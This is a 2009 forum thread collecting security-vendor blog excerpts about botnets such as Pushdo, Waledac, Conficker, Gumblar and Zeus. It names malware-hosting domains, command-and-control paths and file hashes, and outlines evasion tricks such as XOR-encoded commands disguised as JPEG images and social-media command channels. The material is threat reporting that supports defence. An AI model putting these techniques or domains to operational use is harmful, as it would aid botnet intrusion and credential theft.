* http://blog.trendmicro.com/cybercriminals-launch-tainted-windows-7-rc/


2009-05-13, 21:38

- http://blog.trendmicro.com/pushdocutwail-%E2%80%93-the-art-of-spamming/
May 12, 2009 - "... One of the biggest spamming botnets out there is Pushdo. This botnet has managed to stay under the radar since 2007 even though it has been reported to be responsible for a huge percentage of the spam worldwide. It has even managed to make it consistently to the Top 5 largest botnets without ever reaching number one. There are reports of 7.7 billion spammed emails per day coming from this botnet, which puts it in the Top 2 largest spamming botnets worldwide... One of the latest batches contains an executable which displayed popup ads to the user, most probably from an advertiser who paid good money for the mass-deployment of their software. The only component that is always present is the spamming engine, which some antivirus vendors have dubbed as Cutwail..."

- http://blog.trendmicro.com/pushdocutwail-%E2%80%93-from-russia-with-love-part-2-of-5/
May 13, 2009 - "... The famous Storm botnet from 2008 had strong links to the so-called Russian Business Network operating out of St.Petersburg, and from our research it appears that Pushdo is linked to the Moscow area. Like other spam botnets Pushdo’s spamming component, known as Cutwail, sends spam in waves, each advertising a particular service. Normally these consist of porn, pharmacy spam etc – but it was when we started to see ads for Salsa classes and Construction services that we became really interested... As part of our research we contacted the gang on one of the numbers they provided, posing as a potential customer of their spamming services. As customer service satisfaction goes these guys were very helpful, providing us with bank account details that we could pay them through, and even offering to pick up the money in person if we were based in Moscow. On top of that they would throw in a free website design to promote our business, and offered to craft their “advertising mail services” (that’s unsolicited spam to you and me) to best avoid anti-spam signatures..."

(Screenshots available at both URLs above.)


2009-05-18, 23:13

- http://www.secureworks.com/research/blog/index.php/2009/05/12/following-the-trojan-trail/
May 12, 2009 - "... The "Finjan botnet" appears to be large... credit to FireEye for trying to track down the Finjan Botnet that Finjan first reported on. Reading through the Finjan and FireEye write-ups, one is able to reconstruct the trail and also discover the path taken. We can see two major types of Trojans that play a part in this. We have the VBInject Trojan and the AutoIt Trojan... There are two servers on the same network to which -VBInject- phones home: x.x.62.2 and x.x.21.186. The server at x.x.21.186 is no longer responsive and appears down at this time. The server at x.x.62.2 is still up and DNS still responds with that IP address for the domain name used in these attacks. If you actually try to browse to that domain though, you will not arrive at this server. As you can see from reading the FireEye article, the Trojan phones home to /ldr/loadlist.php. It downloads more malware from /ldr/dl/. One of the Trojans it downloads is -AutoIt-... This is the AutoIt Trojan phoning home and the response is to download around 15 pieces of malware...
As you can see by following the trail, gone are the days where you have just one Trojan infection. When you become infected today, it is best to just do a complete reformat of your machine instead of trying to recover it, because you really don’t know how many infections you have. I have read plenty of articles where someone cleans their machine and they think everything is fine only to find more malware days to weeks later.
There is not any perfect AV tool; there is no perfect solution for any one problem. Your best defense is to practice what is called defense in depth and to only go to known websites. Don’t open mail from people you don’t know and be careful opening attachments from people that you do know. Update your OS and software regularly, including AV. Just having AV does not mean that you are protected; you also have to keep it updated."
• FireEye Blog - http://blog.fireeye.com/research/2009/04/botnetweb-part-ii.html
• Finjan article - http://www.finjan.com/MCRCblog.aspx?EntryId=2237
• Prevx shows ZCHMIB.EXE - http://www.prevx.com/filenames/1521641268775071064-X1/ZCHMIB.EXE.html
• ThreatExpert shows TDSS/Seneka activity - http://www.threatexpert.com/report.aspx?md5=5a1a6f4e83900e86c3e7dc62554318ac

(More detail and screenshots available at the Secureworks URL above.)

// http://forums.spybot.info/showpost.php?p=306776&postcount=25

2009-05-21, 12:56

Conficker continues to spread
- http://viewfromthebunker.com/2009/05/20/conficker-continues-to-spread/
May 20, 2009 - "... the Symantec threat intelligence team estimates there are 50,000 newly infected PCs a day right now... the US, Brazil and India top the charts."

(Chart available at the URL above.)

- http://isc.sans.org/diary.html?storyid=5860


2009-06-17, 18:35

Golden Cash botnet
- http://www.finjan.com/MCRCblog.aspx?EntryId=2281
June 17, 2009 - "... A user visits a legitimate compromised website which contains malicious Iframe. This Iframe causes the victim’s browser to pull the exploit code from a server armed with the exploit toolkit. Upon successful exploitation, a special build of a Trojan, created for the attacker, is being pulled from Golden Cash server. Once installed, the Trojan reports back to the Golden Cash server and the attacker’s account at Golden Cash is credited with currency. The first instruction sent by Golden Cash to the victim’s machine, is to install an FTP-grabber (to steal FTP-credentials). Our research found about 100,000 stolen FTP-credentials on the Golden Cash server. The victim’s machine is now in a pool of infected machines controlled by Golden Cash and being auctioned to other criminals, using a different website for buyers. From time to time, the victim’s machine gets instructions to install malware on behalf of the criminal-customer. The Trojan on the victim machine reports back to Golden Cash on each successful installation of the customer’s malware and the criminal-customer account is charged with currency. The victim machine is back in the ‘available for more infections’ pool.... the botnet spreads using distributors. For each distributor, a special bot build is created. The special build assists the cybercriminal to track the installations of each distributor... Some of the stolen FTP-credentials were used to inject malicious Iframe to the webpages that were stored on the FTP server. The reason for this was to infect more machines and generate organic growth. The C&C server is hosted in Texas, US; the registrant country is China. The “proxy’ website that tunnels traffic to the C&C server is hosted in Krasnodar, Russia."

(Screenshots available at the URL above.)


2009-07-08, 14:43

SPAM - from Waledac...
- http://www.eset.com/threat-center/blog/?p=1285
July 7, 2009 - "... After 4th July, we have noticed an increase in the number of emails in circulation, and this week will be even more active. We believe that, like other campaigns, this one will last at least 15 days. However, what many readers may be wondering is why Waledac was “asleep” so many months. The reality is that the Trojan wasn’t spreading at that point. However, the botnet that was built with Waledac, remained as active as ever; working mainly to achieve their most important goal: to send spam. At ESET Latinamerica’s Laboratory, we made some tests to enable us to share information with users that shows the importance of staying uninfected: if my computer is infected with Waledac, how much spam does it send? We infected a computer in the laboratory with one of the Waledac trojans...
After that, we used a tool to monitor network traffic to see how many emails were sent by the botnet, since the system became infected . We made an initial measurement in 4 stages over a period of one hour (at different times of day), and the results were as follows:
• Stage 1: between 18:00 and 19:00 hs. 6968 emails were sent
• Stage 2: between 20:30 and 21:30 hs. 7148 emails were sent
• Stage 3: between 10:00 and 11:00 hs. 5610 emails were sent
• Stage 4: Between 13:00 and 14:00 hs. 6568 emails were sent
Taking the average of emails sent per hour (6548 emails), it is estimated that an infected computer can send about 150,000 emails a day. To be even clearer, that represents nearly two emails per second... If we consider that the network is estimated to consist of at least 20,000 infected computers, it can be seen that the botnet has a theoretical spam-sending capacity of 3 billion emails daily... many users will now understand why their computers work so slowly when their systems are infected..."


2009-07-17, 02:16

- http://www.techworld.com/security/news/index.cfm?newsID=119223
15 July 2009 - "Creators of Waledac malware have used the Conficker botnet as a tool to spread malware of their own, marking the first time Conficker was made available for hire, according to Cisco. Writing in its mid-yearly security report*, Cisco said that this was symptomatic of a wider trend of malware purveyors using established business practices to expand their illegal enterprises. Cisco likened the arrangement between Waledac and Conficker to a partner ecosystem, a term Cisco uses to describe its collaboration with other vendors. Waledac used the Conficker distribution channel to send spam and to expand its own botnet... Web sites that are infected to download malware to unsuspecting visitors will increase, the report predicted. These sites represent nearly 90 percent of all web-based threats, the report says. Creation of botnets would be a particular goal of this type of malware..."
* http://www.cisco.com/en/US/prod/vpndevc/annual_security_report.html


2009-07-24, 13:41

Botnet money...
- http://www.viruslist.com/en/analysis?pubid=204792068
July 22, 2009 - "In the past ten years, botnets have evolved from small networks of a dozen PCs controlled from a single C&C (command and control center) into sophisticated distributed systems comprising millions of computers with decentralized control. Why are these enormous zombie networks created? The answer can be given in a single word: money. A botnet, or zombie network, is a network of computers infected with a malicious program that allows cybercriminals to control the infected machines remotely without the users’ knowledge. Zombie networks have become a source of income for entire groups of cybercriminals. The invariably low cost of maintaining a botnet and the ever diminishing degree of knowledge required to manage one are conducive to growth in popularity and, consequently, the number of botnets... Botnet owners or developers who have been prosecuted can be counted on the fingers of two hands. Which is not the case with botnets that are live on the Internet: the number of these has exceeded 3600... Without help from users, combating botnets cannot be effective. It is home computers that make up the lion’s share of the enormous army of bots. Neglecting to stick to simple security rules, such as using antivirus software, using strong account passwords and disabling the AutoPlay feature for removable media, can result in your computer becoming another botnet member, providing cybercriminals with your data and resources..."


2009-08-15, 00:16

Twitter-based botnet command channel
- http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel/
August 13, 2009 - "While digging around I found a botnet that uses Twitter as its command and control structure. Basically what it does is use the status messages to send out new links to contact, then these contain new commands or executables to download and run. It’s an infostealer operation. The account in question is under analysis by Twitter’s security team. I spotted it because a bot uses the RSS feed to get the status updates. As for the original bot in question that fetches the updates, here’s the VirusTotal analysis*, where you can see it’s detected by 19/41 (46.34%) AV tools under evaluation. We can look at the status messages and discover more nefarious activity; the bot’s hiding new malcode which is poorly detected this way. The original link from the malcode came from a ShadowServer nightly link report, which they make available to folks. Many thanks to them...
UPDATE 14 Aug 2009 - Via bit.ly, some statistics that suggest the malcode has infected a couple hundred PCs, mostly in Brazil..."

(More detail at the URL above.)

* http://www.virustotal.com/analisis/6a6c334ffe5c8e60b1de37582b73a642c68d2b02b0284000d24c93f899122139-1249801350
File 40d09b7d94da70ede50866c55f48613c-2358.txt received on 2009.08.09 07:02:30 (UTC)
Result: 19/41 (46.34%)

* http://www.virustotal.com/analisis/14fd37ef063f3c13d667e7483803a17ec493395a0d0e0365da4bed60272f311e-1250187288
File gbpm.exe received on 2009.08.13 18:14:48 (UTC)
Result: 9/41 (21.95%)

- http://www.symantec.com/connect/blogs/twittering-botnets
August 14, 2009

Infostealer.Bancos heatmap
- http://www.symantec.com/connect/imagebrowser/view/image/974211/_original

- http://www.symantec.com/connect/blogs/downloader-micro-blogging-and-prophecy
August 16, 2009 - "... A new variant of this threat has emerged that uses not only Twitter but also another social networking and micro-blogging site Jaiku.com. Symantec detects this Trojan as Downloader.Sninfs.B*. Like the previous variant, Downloader.Sninfs.B also attempts to get URLs from obfuscated Twitter status messages. However, if that attempt fails, the Trojan will use the RSS feed from an account registered on Jaiku .com to obtain the location of remote files..."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-081603-5537-99&tabid=2
Discovered: August 16, 2009 = "... may be saved as the following files:
%Temp%\[SET OF RANDOM NUMBERS]\gbpm.exe
%Temp%\[SET OF RANDOM NUMBERS]\gbpm.dll
%Temp%\[SET OF RANDOM NUMBERS]\update.exe (copy of gbpm.exe) ..."


2009-08-24, 18:43

Ilomo botnet - All your info are belong to us
- http://blog.trendmicro.com/all-your-info-are-belong-to-us/
August 24, 2009 - "... Ilomo has (been) active for several years now, and like Pushdo has done so without attracting too much unwanted attention from the security industry. Like Pushdo, the Ilomo threat is quite modular in nature which makes it difficult to see the actions of the overall threat. Added to this is the fact that it uses a commercial virtual machine obfuscator, significantly adding to the effort involved in reverse engineering the malware binaries. Ilomo has two key components to its business plan. The first is good old fashioned information stealing. Ilomo injects its code into the browser and monitors the internet connection waiting for the user to connect to one of over 4000 banking, financial or webmail sites. Not content with simply stealing the user’s credentials, Ilomo can also “piggyback” on the user’s session – transferring funds from an infected user’s account and making a mockery of the bank’s secure login system. Ilomo will also harvest all other login credentials from the machine – ftp, web servers, local administrators etc. These are then used to spread itself across the network and to take control of web servers online, which it will use to host new versions of the malware... Ilomo ‘s second source of revenue is selling “anonymity as a service”. Every infected Ilomo machine acts as a proxy so that criminals can route their illegal activities through different networks and countries. In addition to hiding the criminals identity this proxy network is very useful for defeating another defense built into many banking sites – namely that they can only be accessed from certain countries. If a criminal needs to access a Brazilian bank, they simply use an infected Ilomo machine in Brazil to route the connection..."

(Screenshot available at the URL above.)


2009-09-12, 14:26

Botweb using compromised Linux servers
- http://blog.stopbadware.org/2009/09/11/botweb-using-compromised-linux-servers
9.11.2009 - "Over at the Unmask Parasites blog, periodic BadwareBusters.org contributor Denis reports on a botweb ... that he’s been investigating:
'What we see here is a long awaited botnet of zombie web servers! A group of interconnected infected web servers with common control center involved in malware distribution. To make things more complex, this botnet of web servers is connected with the botnet of infected home computer (the malware they serve infects computers and turns them into zombies).'
The blog post* contains a much more thorough analysis of the issue and is worth a read, especially if you work for a hosting provider or manage Linux-based web servers..."
* http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/


2009-09-16, 22:57

Botnet computing power...
- http://blog.trendmicro.com/the-internet-infestation-how-bad-is-it-really/
Sep. 16, 2009 - "Industry experts have previously estimated that, on average, a compromised machine remains infected for 6 weeks. However, our latest research indicates that this estimate is far from accurate. During the analysis of approximately 100 million compromised IP addresses, we identified that half of all IP addresses were infected for at least 300 days. That percentage rises to eighty percent if the minimum time is reduced to a month... The news only gets worse from that point. While three-fourths of the IP addresses in our study were identified with consumer users, the remaining quarter belong to enterprise users. Because a single IP address for these users is typically identified with a single gateway which may, in turn, be connected to multiple machines in an internal network, the actual percentage of enterprise machines affected by malware may be higher than the IP address data suggests. Once a machine becomes compromised, it is not unusual to find it has become part of a wider botnet. Botnets frequently cause damage in the form of malware attacks, fraud, information theft and other crimes. In 2009, virtually all malware tracked by Trend Micro experts are used by cybercriminals to steal information... Overall, botnets control more compromised machines than had been previously believed. Only a handful of criminals (likely a few hundred) have more than 100 million computers under their control. This means that cybercriminals have more computing power at their disposal than the entire world’s supercomputers combined. It’s no wonder then that more than 90 percent of all e-mail worldwide is now spam..."

(More detail and charts available at the URL above.)


2009-09-22, 18:06

Conficker still defeats experts
- http://www.theinquirer.net/inquirer/news/1534307/conflicker-defeats-experts
22 September 2009 - "... The worm has infected more than five million computers in a botnet that could take out the Internet in some countries... Rodney Joffe, a director of the Conficker Working Group formed to defeat the worm said, "The general agreement in the security world is that Conficker is the largest threat facing us from a cyber crime point of view." The worm, which spreads rapidly among personal computers by exploiting a flaw in Microsoft Windows, first surfaced last November. According to Joffe, "it has proven to be extremely resilient. It's almost impossible to remove." Infected PCs are dragooned into a "botnet" controlled by the Conficker worm's unknown authors, which security researchers fear could be used to launch cyber attacks over the Internet..."
- http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionTracking

Conficker C P2P Protocol and Implementation
- http://mtc.sri.com/Conficker/P2P/
Last Update: 21 September 2009
> http://mtc.sri.com/Conficker/P2P/#overview

- http://isc.sans.org/tag.html?tag=conficker

Conficker Eye Chart
- http://www.confickerworkinggroup.org/infection_test/cfeyechart.html


2009-09-29, 19:41

Botnet hides its commands...
- http://www.secureworks.com/research/blog/index.php/2009/09/29/monkifdlkhora-botnet-hiding-its-commands-as-jpeg-images/
September 29, 2009 - "SecureWorks... has been carefully monitoring the activity of the Monkif/DlKhora botnet. This bot is an example of a Downloader trojan, in that its primary purpose is to receive instructions to download and execute other malware. The trojan also attempts to disable anti-virus and personal firewall software to maintain its foothold on the system. One interesting technique the Monkif botnet utilizes to hide its intent on the network is to encode the instructions to appear as if the command and control server is returning a JPEG file. The server sets the HTTP Content-Type header to “image/jpeg” and prefaces the bot commands with a fake 32-byte JPEG header. The bot checks if the header matches and decodes the rest of the response to retrieve its commands. The commands are encoded using a single byte XOR with 0×4. The malware that CTU has observed being installed by Monkif is a BHO (Browser Helper Object) trojan commonly referred to as ExeDot, which performs Ad Hijacking and Ad Clicking. The botnet makes no attempt to pad the commands to make the data size representative of a true JPEG. In addition, the data will not parse to a legitimate JPEG. These attributes may provide opportunities for generic countermeasures to detect the traffic by identifying malformed image data..."


2009-10-17, 20:55

2,000 legit sites serve malware
- http://www.theregister.co.uk/2009/10/16/gumblar_mass_web_compromise/
16 October 2009 - "Cybercriminals have laced about 2,000 legitimate websites with a potent malware cocktail that surreptitiously attacks people who browse to them, a security researcher warned Friday. Unlike past outbreaks of the mass web attack known as Gumblar, this round actually plants exploit code on the website servers themselves. Curiously, the directory and file name of the malicious payload is in most cases unique and identical to a legitimate file that existed on the website. The trick makes it extremely difficult for webmasters and anti-malware programs to detect the threats. "This is an ugly can of worms," said Mary Landesman, the ScanSafe security researcher who warned of the mass attack*. "Any time you see a new technique evolve like this the concern is we'll be seeing much more of this in the future, and certainly it complicates the remediation of the compromised website." Previously, Gumblar planted links in thousands of compromised websites that silently redirected users to a handful of servers that hosted the exploits. That method allowed white hats to foil the attack by shutting down one or two domains. With the malware embedded directly in the compromised websites, the take-down process is significantly more time consuming. Also making matters hard for Landesman to get the sites cleaned up: Most of the websites belong to small businesses that cater to non-English speakers..."
Gumblar Website Botnet Awakes
* http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html

** http://www.virustotal.com/analisis/7c9d0a66a44beb3f6713ae731708fcd041fe1d46b84eaae44caf7f0866f905d1-1255452285
File HiwA7.dat received on 2009.10.13 16:44:45 (UTC)
Result: 7/41 (17.07%)

Zeus Bot Joins Gumblar Attacks
- http://blog.scansafe.com/journal/2009/10/20/zeus-bot-joins-gumblar-attacks.html
October 20, 2009 - "... unlike traditional compromises which simply inject pointers to malware hosted on an attacker-owned domain, in these attacks the compromised domain is also acting as host for the malware itself. This method of attack complicates remediation via technologies that rely on blacklisting because the number of compromised websites (now acting as malware hosts) is in the thousands. It also makes the Gumblar compromised websites a triple threat - potentially exposing visitors to the malware contained on the compromised site, and the malware loaded from ncenterpanel.cn*, and the malware loaded from other compromised sites."
* http://google.com/safebrowsing/diagnostic?site=ncenterpanel.cn/
"...the last time suspicious content was found on this site was on 2009-10-28. Malicious software includes 1209 trojan(s), 876 scripting exploit(s)... this site has hosted malicious software over the past 90 days. It infected 487 domain(s)..."


2009-10-20, 15:40

Zbot botnet - new phishing attacks
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=220700200
Oct. 19, 2009 - "The massive Zbot botnet that spreads the treacherous Zeus banking Trojan has been launching a wave of relatively convincing phishing attacks during the past few days - the most recent of which is a phony warning of a mass Conficker infection from Microsoft that comes with a free "cleanup tool." The wave of attacks began early last week targeting corporations in the form of email messages that alerted victims of a "system upgrade." Email is accompanied by poisoned attachments and links; in some cases it poses as a message from victims' IT departments, including their actual email domains, and alerts them about a "security upgrade" to their email accounts. The message then refers victims to a link to reset their mailbox accounts, and the link takes them to a site that looks a lot like an Outlook Web Access (OWA) page (PDF), but instead infects them with the Zeus Trojan. Today, researchers at F-Secure spotted the botnet spamming out malware-laden email that tries to trick recipients with a convincing lure messages that says, "On October 22, 2009 server upgrade will take place"... The Shadowserver Foundation has seen multiple versions of Zeus-related attacks lately, including the Conficker "cleanup utility" that poses as an email from Microsoft, according to Andre DiMino, director of Shadowserver. And the targeted Outlook attacks use real domains: "What is also interesting about the recent campaign is that the email comes from the targeted user's own domain with an 'administrator' prefix. The link is disguised to look like it's from an update server on the local domain, but instead points to the malicious location"..."

- http://atlas.arbor.net/
"... We are also seeing email spam attacks to spread malware from the Bredolab botnet, from the ZBot botnet, and a Rogue AV downloader purporting to be an anti-conficker system update. "


2009-10-29, 17:38

Bredolab trojan - botnet targets Facebook users
- http://www.computerworld.com/s/article/9140058/Massive_bot_attack_spoofs_Facebook_password_messages?taxonomyId=16
October 28, 2009 - "A massive bot-based attack has been hitting Facebook users, with nearly three-quarters of a million users receiving fake password reset messages (email SPAM), according to security researchers. The attack, which began Monday afternoon, according to e-mail security vendor Cloudmark*, targets Facebook users with a spoofed message that claims recipients' Facebook passwords have been reset as a security measure. The messages, which come bearing subject lines such as "Facebook Password Reset Confirmation," include a file attachment that supposedly contains the new password. In fact, the attached .zip file includes a Trojan downloader, dubbed "Bredlab" by some antivirus companies, "Bredolab" by others... At least 8% of the users who have received one of the fake messages have tagged it as legitimate, going to the trouble of pulling the message from their junk folder - where Cloudmark has placed it - because they think it's real... Cloudmark has no data on how many users were actually duped into opening the .zip file and running the enclosed .exe that installs Bredolab..."
* http://news.cnet.com/8301-27080_3-10385498-245.html

> http://forums.spybot.info/showpost.php?p=344089&postcount=166


2009-11-02, 13:03

Conficker infects 7M computers
- http://www.computerworld.com/s/article/9140171/After_one_year_Conficker_infects_7M_computers?
October 30, 2009 - "The Conficker worm has passed a dubious milestone. It has now infected more than 7 million computers, security experts estimate. On Thursday, researchers at the volunteer-run Shadowserver Foundation logged computers from more than 7 million unique IP addresses*, all infected by the known variants of Conficker. They have been able to keep track of Conficker infections by cracking the algorithm the worm uses to look for instructions on the Internet and placing their own "sinkhole" servers on the Internet domains it is programmed to visit. Conficker has several ways of receiving instructions, so the bad guys have still been able to control PCs, but the sinkhole servers give researchers a good idea how many machines are infected..."
* http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionTracking

Conficker Eye Chart
- http://www.confickerworkinggroup.org/infection_test/cfeyechart.html


2009-11-02, 14:25

Gumblar attacks spread to thousands of new sites
- http://threatpost.com/en_us/blogs/gumblar-attacks-spread-thousands-new-sites-103009
October 30, 2009 - "Gumblar, the nasty bit of malware that was part of a mass SQL injection on legitimate Web sites this spring, is continuing to spread and its creators have been busy lately, compromising hundreds of new sites, leading to a massive new wave of infections of end-user PCs... In Gumblar's case, the iFrame redirection is the tactic of choice and it has been quite effective. In its original form Gumblar was redirecting victims to one of two remote sites, Gumblar .cn or Martuz .cn. The latest incarnation is pointing victims to thousands of servers in more than 200 countries that are now spreading Gumblar, according to research by Michael Molsner of Kaspersky Lab*. More than 7,200 servers spreading Gumblar are in the U.S., and many of the sites compromised around the globe are in the .gov and .edu domains. "Our accumulated data for one week showed 443748 access hits in total - and that is only a part of the whole incident. For several days after we noticed this new threat and added detection of the malicious files targeting Adobe Reader and Flash Player, there was surprisingly little talk about it in IT security circles. The 'new gumblar' took some time to get noticed more widely and _still_ seems unnoticed by many. However, it is very active indeed and as a side effect several PC vendors support lines have been flooded with queries about sudden reboots etc. There are also reports that machines infected with a buggy version of gumblar fail to boot completely, leaving the screen black and only the mouse pointer visible."
Experts say that many of the machines that have been infected with Gumblar and other similar pieces of malware often are re-infected once they've been cleaned as users don't realize that their browsers are vulnerable and that the seemingly safe sites they're visiting are in fact serving malware."
* http://www.viruslist.com/en/weblog?weblogid=208187886
October 30, 2009

- http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... last time Google visited this site was on 2009-11-01, and the last time suspicious content was found on this site was on 2009-11-01... It infected 6073 domain(s)..."
- http://google.com/safebrowsing/diagnostic?site=martuz.cn/
"... last time Google visited this site was on 2009-11-01, and the last time suspicious content was found on this site was on 2009-11-01... It infected 8328 domain(s)..."


2009-11-04, 14:10

Fast Flux by the Numbers - Q3 2009
- http://asert.arbornetworks.com/2009/11/q3-2009-fast-flux-by-the-numbers/
November 2, 2009 - "... This year’s seen a huge uptick in Avalanche domains**, and the release of notes from ICANN on the Fast Flux Working Group* as well as a specific note around Avalanche. Arbor, like a few others, has been actively working with registries to address fast flux... Comparing to Q2... the biggest gainers are .tk and .eu, with .uk coming in as a new top 10 player. We’ve been trying to work with .eu as they are being targeted, along with .uk, by the Avalanche guys. However, our efforts in .eu are largely fruitless while Nominet in the UK has defended .uk quite handily. The .tk stuff we’re looking at, as it could be a false positive due to the way that .tk hosts stuff... Across all domain names, in Q3 we saw more TLDs hit, some 34 (against Q2’s 26 distinct TLDs). The attackers are striking at more TLDs in hopes of finding the soft spots, ones that just don’t respond. The average lifetime of a fast flux domain name: 418063 seconds, or about 9.7 days. CN domains are taken down within 7.8 days, EU domain names within 1.6 days, COM domains within 7.23 days, and TK domains within 1.44 days... Average lifetime of all domains in Q2: 21 days. Three weeks! That’s success now that we’re down to under 10 days. A cursory examination of this data suggests that while numbers are up, response times are getting better. This may be something worth cheering. Also, it appears that fast flux is still being used for the same old stuff: phishing, malware, malvertising, child porn, and the like."

(Charts available at the URL above.)

- http://atlas.arbor.net/summary/fastflux

Fast Flux Working Group
* https://st.icann.org/pdp-wg-ff/index.cgi?fast_flux_pdp_wg

** http://threatpost.com/en_us/blogs/avalanche-crimeware-kit-fuels-phishing-attacks-102309


2009-11-05, 16:09

Gumblar authors crash WordPress sites
- http://www.networkworld.com/news/2009/110409-botnet-authors-crash-wordpress-sites.html?hpg1=bn
11/04/2009 - "Webmasters who find an annoying error message on their sites may have caught a big break, thanks to a slip-up by the authors of the Gumblar botnet. Tens of thousands of Web sites, many of them small sites running the WordPress blogging software, have been broken, returning a "fatal error" message in recent weeks. According to security experts those messages are actually generated by some buggy malicious code sneaked onto them by Gumblar's authors... Gumblar's authors apparently made some changes to their Web code... and as a result "the current version of Gumbar effectively breaks WordPress blogs"*... WordPress sites that have crashed because of the buggy code display the following error message: Fatal error: Cannot redeclare xfm() (previously declared in /path/to/site/index.php(1) : eval()'d code:1)
in /path/to/site/wp-config.php(1) : eval()'d code on line 1
Other sites running software such as Joomla get different fatal-error messages... In effect, the messages warn Gumblar's victims that they've been compromised..."
* http://blog.unmaskparasites.com/2009/11/04/gumblar-breaks-wordpress-blogs-and-other-complex-php-sites/
04 Nov 09

WordPress Exploit Scanner
- http://wordpress.org/extend/plugins/exploit-scanner/
• Version: 0.6
• Last Updated: 2009-11-4
• Requires WordPress Version: 2.7.1 or higher
• Compatible up to: 2.8.5


2009-11-06, 19:16

Gumblar malware domain reactivated
- http://blog.scansafe.com/journal/2009/11/5/gumblarcn-its-baaaack.html
November 5, 2009 - "... some of the compromises were following a different pattern than we'd been seeing over the past couple of weeks. Further investigation revealed the newest iframe injection was pointing once again to gumblar .cn - the malware domain that originally earned Gumblar its name. The domain's reactivation occurred less than 24 hours ago, but it has ramifications that could stretch back for months. Any sites compromised in the May Gumblar attacks that were not yet cleaned up (unfortunately an all-to-common occurrence) could now start becoming vectors of Gumblar infection once again. This is in addition to new compromises pointing to the newly activated gumblar .cn and the already very active Gumblar compromises which are using compromised websites as malware hosts*...
Edited to add: This is not the first example of registrars releasing malware domain names back into use..."
* http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html
October 15, 2009

- http://www.iss.net/threats/gumblar.html

- http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... last time Google visited this site was on 2009-11-06, and the last time suspicious content was found on this site was on 2009-11-06... It infected 5918 domain(s)..."
- http://google.com/safebrowsing/diagnostic?site=martuz.cn/
"... last time Google visited this site was on 2009-11-06, and the last time suspicious content was found on this site was on 2009-11-06... It infected 8558 domain(s)..."

- http://www.sophos.com/blogs/sophoslabs/v/post/7342
November 8, 2009


2009-11-11, 19:33

The Gumblar system
- http://www.viruslist.com/en/weblog?weblogid=208187897
November 11, 2009 - "... Analysis of some infected websites showed that the only way to inject the infection of Gumblar was by using FTP access, because those websites have no server-side scripting. Later this was proved by an analysis of FTP log files... it's a fully automated system. It's a new generation of self-building botnets. This system is actively attacking visitors of a website and once these visitors have been infected with the Windows executable, it grabs FTP credentials from the victim machines. The FTP accounts are then used to infect every webpage on new webservers. This way the system extends the number of infected pages, thus attacking more and more computers. The entire process is automated and the owner of the system just needs to adjust the system and update the Trojan executable which steals passwords and the exploits used to attack the browser. The system works in a constant loop of attacking new computers, getting new FTP accounts and infecting new servers..."

(Screenshots available at the URL above.)


2009-12-04, 14:53

Gumblar infection count
- http://www.viruslist.com/en/weblog?weblogid=208187923
December 04, 2009 - "We've now analyzed more than 600 MB of collected data related to the recent resurrection of the Gumblar threat. Overall, we've identified 2000+ Infectors (computers hosting the malicious *.php files and payload) and 76100+ 'Redirectors' (computers with links leading back to the malicious sites). Most Infectors are also part of the group of Redirectors, they serve one *.php file and additionally contain the link to another Infector in their own entry page..."


2009-12-04, 23:36

Max Power - many malware domains
- http://isc.sans.org/diary.html?storyid=7693
Last Updated: 2009-12-04 19:46:31 UTC - "Who Max Power is? Well, we don't know either. It's a pseudonym of a gang or guy who has a decent-sized spyware racket going. Max has been sitting on the same IP address for the past three months,, in AS9929. ChinaNet. Even Google knows that 10% of the sites in this AS are malicious. Looking at the IP address in Reverse DNS or MalwareURL.com, we can see the many malware domains "Max Power" has been using in the recent past. Some of the names are associated with the Koobface and Zeus malware families. The address lay dormant for the last week of November, but just woke up again yesterday morning, and is currently serving the malware domain "tempa3-dot-cn". This domain is at the moment linked to from various questionable "pharmaceuticals" web sites, and it currently pushes a bunch of exploits which, if successful, download and run a backdoor of the "TDSS"/"Tidserv" family. Detection was dismal at first*, but has improved a bit over the last 24 hours**."
* http://www.virustotal.com/en/analisis/f7152a760e6182ad4881c5f77d50df1aa1221b5fa0482f5678ddb3101d2c643f-1259872180
File load.exe received on 2009.12.03 20:29:40 (UTC)
Result: 6/40 (15.00%)
** http://www.virustotal.com/en/analisis/f7152a760e6182ad4881c5f77d50df1aa1221b5fa0482f5678ddb3101d2c643f-1259949728
File load.exe received on 2009.12.04 18:02:08 (UTC)
Result: 18/41 (43.90%)


2009-12-10, 10:54

Zeus bot using Amazon as C&C server
- http://www.theregister.co.uk/2009/12/09/amazon_ec2_bot_control_channel/
9 December 2009 - "... a new variant of the Zeus banking trojan has been spotted using the popular Amazon service as a command and control channel for infected machines. After marks get tricked into installing the password-logging malware, their machines began reporting to EC2 for new instructions and updates, according to researchers from CA's internet security business unit*... Over the past few months, accounts on Twitter, Google's app engine, and Facebook have also been transformed into master control channels for machines under the spell of surreptitious malware... According to analysis** from Zero Day blogger Dancho Danchev, the cybercriminals behind Zeus appear to have plugged into Amazon's Relational Database Service as a backend alternative in case they lose access to their original domain..."
* http://community.ca.com/blogs/securityadvisor/archive/2009/12/09/zeus-in-the-cloud.aspx

** http://blogs.zdnet.com/security/?p=5110

- http://sunbeltblog.blogspot.com/2009/12/is-botnet-c-and-c-headed-for-cloud.html
December 10, 2009


2009-12-17, 06:10

Group IDs hotbeds of Conficker worm outbreaks
- http://voices.washingtonpost.com/securityfix/2009/12/group_ids_hotbeds_of_conficker.html
